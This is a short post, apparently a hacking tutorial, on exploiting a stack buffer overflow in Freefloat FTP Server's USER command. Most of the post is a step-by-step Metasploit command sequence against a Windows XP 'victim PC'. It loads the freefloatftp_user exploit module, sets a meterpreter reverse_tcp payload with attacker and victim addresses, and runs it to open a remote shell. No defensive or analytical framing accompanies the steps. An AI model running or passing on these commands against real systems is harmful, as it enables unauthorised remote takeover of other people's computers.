Hack Remote PC using Free Float FTP Server USER Command Buffer Overflow

Freefloat FTP Server is prone to an overflow condition. It fails to properly sanitize user-supplied input resulting in a stack-based buffer overflow. With a specially crafted 'USER' command, a remote attacker can potentially have an unspecified impact.

Exploit Targets
FreeFloat FTP Server

Attacker: Backtrack 5
Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/ftp/freefloatftp_user
msf exploit (freefloatftp_user)>set payload windows/meterpreter/reverse_tcp
msf exploit (freefloatftp_user)>set lhost (IP of Local Host)
msf exploit (freefloatftp_user)>set rhost (IP Address of Victim PC)
msf exploit (freefloatftp_user)>exploit  


Post a Comment